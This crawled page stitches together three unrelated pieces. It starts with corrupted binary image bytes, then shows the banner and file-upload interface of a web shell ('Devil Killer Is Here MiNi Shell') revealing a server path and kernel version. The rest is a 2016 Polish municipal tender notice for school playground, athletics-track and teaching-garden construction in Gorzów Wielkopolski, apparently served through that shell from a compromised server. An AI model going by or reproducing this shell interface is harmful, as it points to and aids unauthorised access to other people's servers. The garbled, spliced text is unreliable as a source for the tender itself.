JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160615/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160615/88069-N-2016.html

<p class="kh_header"><b>Gorzów Wielkopolski: Budowa placu zabaw ze ścieżką przyrodniczą na terenie Szkoły Podstawowej nr 4 przy ul. Kobylogórskiej 110, kompleksu lekkoatletycznego przy boisku Zespołu Szkół Budowlanych przy ul. Okrzei 42 oraz ogródka dydaktycznego Świat wokół nas przy Szkole Podstawowej nr 12 przy ul. Dobrej</b><br>
<b>Numer ogłoszenia: 88069 - 2016; data zamieszczenia: 15.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wrota.lubuskie.pl/umgorzow/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placu zabaw ze ścieżką przyrodniczą na terenie Szkoły Podstawowej nr 4 przy ul. Kobylogórskiej 110, kompleksu lekkoatletycznego przy boisku Zespołu Szkół Budowlanych przy ul. Okrzei 42 oraz ogródka dydaktycznego Świat wokół nas przy Szkole Podstawowej nr 12 przy ul. Dobrej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie Częściowe nr 1: Budowa placu zabaw ze ścieżką przyrodniczą na terenie Szkoły Podstawowej nr 4

Przedmiotem zamówienia jest zagospodarowanie działki i uformowanie nawierzchni w celu wydzielenia terenów: zabawowo-rekreacyjnego z montażem obiektów małej architektury (obiektów służących zabawie i rekreacji) i edukacyjno-przyrodniczego z urządzeniem zieleni, wykonaniem utwardzonej ścieżki i montażem obiektów małej architektury (obiektów edukacyjnych). Inwestycja obejmuje działkę nr 407/2, obręb 11 - Zakanale.

Przedmiot robót obejmuje: 
- rozbiórkę istniejącej nawierzchni asfaltowej płyty boiska.
- wykonanie nawierzchni: bezpiecznej (Piaskowej) na części zabawowo-rekreacyjnej, komunikacyjnej na pozostałym obszarze części zabawowo-rekreacyjnej oraz z betonowej kostki brukowej na części edukacyjno-przyrodniczej (nawierzchnie powinny być wykonane zgodnie ze szczegółowymi wytycznymi zawartymi w projekcie zagospodarowania terenu). 
- wyposażenie części zabawowo-rekreacyjnej w posiadające odpowiednie atesty i certyfikaty bezpieczeństwa urządzenia, których typ i ilość wyszczególnione zostały w projekcie zagospodarowania terenu, 
- urządzenie zieleni poprzez nasadzenie drzew i krzewów (wg ilości i rodzaju wskazanych w projekcie), posadzenie żywopłotu z 63 sztuk krzewu bukszpanu,
- wykonanie ogrodu zmysłów o pow. min. 25 m2 zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- wykonanie alpinarium o pow. 55 m2 zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- wykonanie ogrodu botanicznego o pow. 52 m2 zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- założenie łąki kwietnej o powierzchni min. 210 m2 zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- wykonanie muld chłonnych zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- wykonanie studni chłonnej zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu.
- wykonanie gier malowanych na asfalcie zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- wykonanie pasa płyt ściekowych zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- wykonanie innych elementów zagospodarowania terenu: tablic edukacyjnych, tablic gatunkowych - drzewa i krzewy, tablic gatunkowych - byliny i drobna roślinność ogrodu botanicznego, alpinarium i ogrodu zmysłów, tablicy informacyjnej z miejscami wschodu i zachodu słońca, światowidu, zegara słonecznego, tablicy edukacyjnej łąki kwietnej i gnomonu, skały na alpinarium wraz z tabliczkami informacyjnymi i górki zabaw.
- wykonanie tablic informacyjnych zawierających regulamin korzystania z obiektów.
- wykonanie i montaż tablicy informującej o źródle finansowania inwestycji - tablica Budżetu Obywatelskiego - wg załączonego wzoru o minimalnych wymiarach 40x60cm umieszczona w widocznym miejscu w pobliżu inwestycji (na innych tablicach z regulaminem lub w ramach osobnej tablicy).
Uwaga. Płyty zjazdowe zjeżdżalni należy wykonać z tworzywa sztucznego, zapewniając tym samym  maksymalne bezpieczeństwo bawiących się na tych obiektach dzieci.

Zamówienie Częściowe nr 2: Budowa mini kompleksu lekkoatletycznego przy boisku Zespołu Szkół Budowlanych przy ul. Okrzei 42.

Przedmiotem zamówienia jest:
- likwidacja istniejącej bieżni i stworzenie w jej miejscu nowej czterotorowej bieżni długości pasów 100 m (całkowita długość projektowanego elementu to 120,75m). Bieżnia o nawierzchni syntetycznej poliuretanowej ułożonej na przepuszczalnej podbudowie z kruszywa oraz z betonu jamistego. Wyposażenie bieżni w blok startowy treningowy o długości 80 cm, posiadający na długości 58 cm skokową regulację rozstawu płytek, oparcia stóp co 2,5 cm, mocowany do bieżni za pomocą kołków.
- budowa skoczni do skoku w dal umiejscowionej równolegle do bieżni. Rozbieg skoczni oraz podbudowa pod nawierzchnią o parametrach i technologii jak na bieżni. Wyposażenie skoczni w belkę do skoku w dal laminowaną, wzmocnioną (wykonaną z żywicy epoksydowej) o wymiarach 1201 x 340 x 100mm, skrzynkę do skoku w dal wykonaną z blachy aluminiowej, fundamentowaną na rozbiegu o wymiarach 1220 x 300 x 100mm. Pokrywa skrzynki wykonana z blachy stalowej cynkowanej ogniwo, zamykającej skrzynie po wyjęciu belki, góra pokrywy wyklejona powierzchnią sztuczną, z której wykonany jest rozbieg skoczni.
- budowa rzutni do pchnięcia kulą składającej się z koła i pola rzutów. Koło obramowane pierścieniem stalowym o średnicy wewnętrznej 1,135m wykonanym z płaskownika 0,6x0,8cm. Nawierzchnia koła projektowana jako betonowa zatarta na ostro. Pole rzutów o wymiarach wycinka koła 34 stopni 92 minuty o promieniu 20m o nawierzchni z mączki ceglanej ograniczony obrzeżem betonowym 8x30cm z nakładką elastyczną. Miedzy kołem a polem rzutów należy zainstalować próg wykonany z drewna klejonego i pokryty laminatem, montowany do podłoża za pomocą kołków rozporowych.
- wykonanie tablic informacyjnych zawierających regulamin korzystania z obiektów sportowych i ich montaż na przedmiotowych obiektach.
- wykonanie i montaż tablicy informującej o źródle finansowania inwestycji - tablica Budżetu Obywatelskiego - wg załączonego wzoru o minimalnych wymiarach 40x60cm umieszczona w widocznym miejscu w pobliżu inwestycji (na innych tablicach z regulaminem lub w ramach osobnej tablicy).

Zamówienie Częściowe nr 3: Budowa ogródka dydaktycznego Świat wokół nas przy Szkole Podstawowej nr 12 przy ul. Dobrej.

Przedmiotem zamówienia jest zagospodarowanie działki i uformowanie nawierzchni w celu wydzielenia terenu służącego jako tzw. zielona szkoła, czyli miejsce na posesji szkolnej, gdzie będą mogły odbywać się zajęcia edukacyjne poza budynkiem szkoły. Inwestycja obejmuje działkę nr 349, obręb 9 - Wieprzyce w Gorzowie Wlkp. 

Przedmiot robót obejmuje: 
- rozbiórkę istniejącej nawierzchni asfaltowej płyty boiska.
- wykonanie nawierzchni naturalnej - w tym  zielonej wyspy o pow. 130 m2, ścieżki wokół zielonej wyspy o pow. 100 m2 i trawnika 855 m2 . 
- wykonanie i montaż następujących elementów małej architektury: bramy wejściowej z logiem szkoły i napisem Ogródek dydaktyczny, stelaża pod regulamin korzystania z obiektu, stelaża pod tablice edukacyjne łączony w czworobok, stelaż pod tablice edukacyjne jednostronny, tablice edukacyjne do zamontowania na stelażach, tablica z regulaminem użytkowania, fotościanka, memo poznaj zwierzę, wrzutki, puzzle jakie to zwierzę, gra rozkład śmieci, światowid, wiatromierz, zadaszone ławo stoły drewniane, drewniana ciuchcia, trzy kosze do segregacji odpadów. Ww. elementy wykonane powinny być w przeważającym udziale z drewna.
- wykonanie i montaż elementów małej architektury niemontowanej trwale z gruntem: kompostownik, drewniana ciuchcia, kosze do segregacji odpadów, karmnik dla ptaków, budki lęgowe dla ptactwa rozwieszone na drzewach, zadaszone ławo stoły drewniane.
- wykonanie brukowanego placu przy elemencie kierunki świata.
- urządzenie zieleni: nasadzenie roślinności, obsianie terenu trawą i przycięcie (prześwietlenie) znajdujących się na terenie inwestycji drzew.
- wykonanie i montaż tablicy informującej o źródle finansowania inwestycji - tablica Budżetu Obywatelskiego - wg załączonego wzoru o minimalnych wymiarach 40x60cm umieszczona w widocznym miejscu w pobliżu inwestycji (na innych tablicach z regulaminem lub w ramach osobnej tablicy).
- Rozbiórka dwóch nieużytkowanych murowanych budynków gospodarczych jednokondygnacyjnych (budynki nr ewid. 349;4 i 349;5 o pow. zabudowy 54 m2 i 20 m2) znajdujących się na terenie działki 349 dla których decyzją z dnia 9.12.2015 r. sprostowaną postanowieniem z dnia 07.06.2016 r. PINB dla miasta Gorzów Wlkp. wydał nakaz rozbiórki.
- Wywóz materiału porozbiórkowego oraz uporządkowanie terenu objętego rozbiórką..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zgodnie z art. 67 ust. 1 pkt 6 stawy Pzp. Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.10.00.00-8, 45.11.00.00-1, 45.11.10.00-8, 45.11.20.00-5, 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-9, 45.11.27.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamówienie Częściowe nr 1: 2 500,00 zł (słownie: dwa tysiące pięćset zł)
Zamówienie Częściowe nr 2: 2 000,00 zł (słownie: dwa tysiące  zł)
Zamówienie Częściowe nr 3 1 500,00  zł (słownie: tysiąc pięćset zł)
Wadium wnosi się odrębnie na każde zamówienie częściowe.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) warunkiem udziału w postępowaniu na zadanie częściowe nr 1 i/lub zadanie częściowe nr 3 jest wykonanie w okresie ostatnich pięciu lat przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym  okresie  co najmniej dwóch robót budowlanych, z czego każda polegała na zagospodarowaniu terenu pod: plac zabaw wraz z montażem urządzeń zabawowo-rekreacyjnych lub ogródek dydaktyczny wraz z montażem tablic edukacyjnych.

b) warunkiem udziału w postępowaniu na zadanie częściowe nr 2 jest wykonanie w okresie ostatnich pięciu lat przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwóch robót budowlanych, z czego każda polegała na budowie, rozbudowie, przebudowie boiska sportowego o nawierzchni poliuretanowej lub budowie min. czterotorowej bieżni o nawierzchni poliuretanowej i długości min. 60 m.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu na zadanie częściowe nr 1 i/lub zadanie częściowe nr 2 i/lub zadanie częściowe nr 3 jest dysponowanie na czas realizacji zamówienia osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej (kierownik budowy) w zakresie niezbędnym do realizacji zamówienia. Jeżeli Wykonawca składa ofertę na więcej niż jedno zamówienie częściowe, może wskazać jednego kierownika budowy, który będzie właściwym dla kilku zadań.

Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (tj. Dz. U. z 2013 r. poz. 1409 z późniejszymi zmianami) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008r., nr 63, poz. 394 ze zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Upoważnienie dla osoby reprezentującej Wykonawcę, o ile nie wynika to z innych dokumentów. W przypadku zawiązania konsorcjum należy załączyć pełnomocnictwo dla podmiotu reprezentującego kilku Wykonawców.
2. Pisemne zobowiązanie do współpracy osób lub podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - załączyć w przypadku polegania na osobach innych podmiotów.
3.Jeżeli w miejscu zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu określonego w pkt III.4.3.1) - zastępuje się go dokumentem (wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) zawierającym oświadczenie złożone przed notariuszem, właściwym organem  sądowym, administracyjnym lub  organem samorządu zawodowego lub gospodarczego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin końcowy wykonania zamówienia - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian do umowy na następujących 
 warunkach:
1) Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych w Ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę.
2) Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów  w następujących przypadkach:
a) śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
b) nie wywiązywania się kluczowego specjalisty z obowiązków wynikających z umowy.
3) Jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji itp.).
4) Zamawiający może zażądać od Wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że kluczowy specjalista nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany kluczowego specjalisty nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
5) Przedłużenie terminu wykonania przedmiotu umowy może nastąpić o czas opóźnienia leżącego po stronie Zamawiającego, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy, tj.:
a) przekazania terenu budowy,
b) przekazania dokumentacji budowy ( dokumentacji projektowej, specyfikacji technicznych,  innych wymaganych przepisami, do których Zamawiający był zobowiązany),
c) przekazania dokumentów zamiennych budowy lub usunięcia wad w dostarczanej dokumentacji projektowej,
d) zmiany terminu dokonania prób końcowych i wniosków o dokonanie prób dodatkowych nieobjętych umową,
6) Przedłużenie terminu wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
a) zawieszenia robót przez organy nadzoru budowlanego z przyczyn niezależnych od Wykonawcy,
b) wykopalisk uniemożliwiających wykonanie robót,
c) szczególnie niesprzyjających warunków  atmosferycznych uniemożliwiających prowadzenie robót budowlanych,  przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, (poza warunkami charakterystycznymi dla pory roku),
d) siły wyższej, klęski żywiołowej,
e) jakiegokolwiek opóźnienia, utrudnienia lub przeszkody  spowodowanych przez Zamawiającego lub dających się przypisać Zamawiającemu lub innemu Wykonawcy zatrudnionemu przez Zamawiającego na terenie budowy,
f) niewypałów i niewybuchów,
g) odmiennych od przyjętych w dokumentacji projektowej warunków  geologicznych,
h) odmiennych od przyjętych w dokumentacji projektowej warunków terenowych (zagospodarowania terenu), w szczególności istnienie podziemnych urządzeń, sieci uzbrojenia, instalacji lub obiektów  infrastrukturalnych.
7) Przedłużenie terminu  z tytułu wstrzymania robót przez  Zamawiającego, ale z wykluczeniem sytuacji kiedy wstrzymanie robót jest spowodowane z winy Wykonawcy, a w szczególności gdy ujawniły się nieprawidłowości w jakości, technologii robót, materiałów.
8) Przedłużenie terminu jeżeli powstaną okoliczności będące następstwem działania organów administracji polegające na przekroczeniu zakreślonych przez prawo terminów wydawania przez organy administracji decyzji,  zezwoleń  itp.,
9) Zmiana  wynagrodzenia  może nastąpić, na zasadach określonych  przez strony, w przypadku jeżeli powstanie konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji  projektowej, a w szczególności zmiany:
